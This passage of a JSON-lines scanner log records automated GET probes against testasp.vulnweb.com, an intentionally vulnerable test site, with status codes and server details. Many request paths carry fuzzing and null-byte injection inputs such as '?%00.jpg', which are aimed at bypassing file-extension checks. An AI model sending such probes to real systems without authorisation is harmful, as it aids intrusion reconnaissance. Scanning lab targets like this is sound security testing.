Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.472424624Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1833,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1833,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1833,0,active\",\"time\":\"344.387815ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.533536021Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1835,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1835,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1835,0,active\",\"time\":\"343.819811ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.537800247Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,1,1834,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,1,1834,0,active\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,1,1834,0,active\",\"time\":\"347.888307ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.540402194Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,http://testasp.vulnweb.com/t/fit.txt,duhdfaka,1,1,1,YTVWIBx2,1\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,http://testasp.vulnweb.com/t/fit.txt,duhdfaka,1,1,1,YTVWIBx2,1\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,http://testasp.vulnweb.com/t/fit.txt,duhdfaka,1,1,1,YTVWIBx2,1\",\"time\":\"343.313871ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.543458205Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,sdnnqmft\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,sdnnqmft\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,sdnnqmft\",\"time\":\"344.884726ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.562752913Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt,wjfefrto\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt,wjfefrto\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt,wjfefrto\",\"time\":\"352.110533ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.600823404Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt...\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt...\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt...\",\"time\":\"357.485848ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.669149916Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt///////$1$mn7wGEod$VqY6Wy4dFf/Zou5NudQPj/\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt///////$1$mn7wGEod$VqY6Wy4dFf/Zou5NudQPj/\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt///////$1$mn7wGEod$VqY6Wy4dFf/Zou5NudQPj/\",\"time\":\"345.978405ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:27.735103588Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt///////dgsevhpu///////$1$L.3pB6Ua$Rhy63YHgg9yDovgCCXfwd1\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt///////dgsevhpu///////$1$L.3pB6Ua$Rhy63YHgg9yDovgCCXfwd1\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt///////dgsevhpu///////$1$L.3pB6Ua$Rhy63YHgg9yDovgCCXfwd1\",\"time\":\"354.588793ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.024741444Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt///////kygwrvcg///////$1$hYQ/y6aR$ywIL2BExoe932VJ84PMQj0\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt///////kygwrvcg///////$1$hYQ/y6aR$ywIL2BExoe932VJ84PMQj0\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt///////kygwrvcg///////$1$hYQ/y6aR$ywIL2BExoe932VJ84PMQj0\",\"time\":\"358.246822ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.057178061Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00\",\"time\":\"339.553268ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.058801879Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt///////njqgnolp///////$1$u3nuRp4L$aCWw1vDLN2vyRO95GFcbf.\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt///////njqgnolp///////$1$u3nuRp4L$aCWw1vDLN2vyRO95GFcbf.\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt///////njqgnolp///////$1$u3nuRp4L$aCWw1vDLN2vyRO95GFcbf.\",\"time\":\"350.404778ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.07310965Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.com%2f%3fref%3dtn_tnmn\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.com%2f%3fref%3dtn_tnmn\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.com%2f%3fref%3dtn_tnmn\",\"time\":\"344.284981ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.085457005Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg\",\"time\":\"354.128062ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.085479239Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.gif\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.gif\",\"time\":\"356.214149ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.085501513Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1199\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1199\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg%5E1199\",\"time\":\"343.888409ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.104990812Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1537\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1537\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg%5E1537\",\"time\":\"355.914539ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.117432224Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1872\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E1872\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg%5E1872\",\"time\":\"358.510136ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.123278425Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E781\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg%5E781\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg%5E781\",\"time\":\"355.833278ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.123326462Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1003,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1003,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1003,0,active\",\"time\":\"347.578685ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.132068369Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1007,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1007,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1007,0,active\",\"time\":\"348.613211ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.144224609Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1015,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1015,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1015,0,active\",\"time\":\"352.14437ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.144335878Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1019,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1019,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1019,0,active\",\"time\":\"343.954219ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.148515912Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1011,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1011,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1011,0,active\",\"time\":\"356.214739ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.38951026Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1023,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1023,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1023,0,active\",\"time\":\"355.835025ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.456860626Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1027,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1027,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1027,0,active\",\"time\":\"348.414939ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.519023407Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1031,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1031,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1031,0,active\",\"time\":\"344.717203ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.550083854Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1035,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1035,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1035,0,active\",\"time\":\"347.817075ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.550320175Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1039,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,1039,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,1039,0,active\",\"time\":\"339.518922ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.655761241Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,909,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,909,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,909,0,active\",\"time\":\"344.537522ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.814865426Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,915,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,915,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,915,0,active\",\"time\":\"340.131489ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.883815996Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,923,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,923,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,923,0,active\",\"time\":\"343.532918ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.886506977Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,927,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,927,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,927,0,active\",\"time\":\"344.284307ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.887407931Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,919,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,919,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,919,0,active\",\"time\":\"351.733095ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.897662268Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,931,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,931,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,931,0,active\",\"time\":\"352.020019ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:37.917167067Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,935,0,active\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?%00.jpg,1,935,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?%00.jpg,1,935,0,active\",\"time\":\"351.897038ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 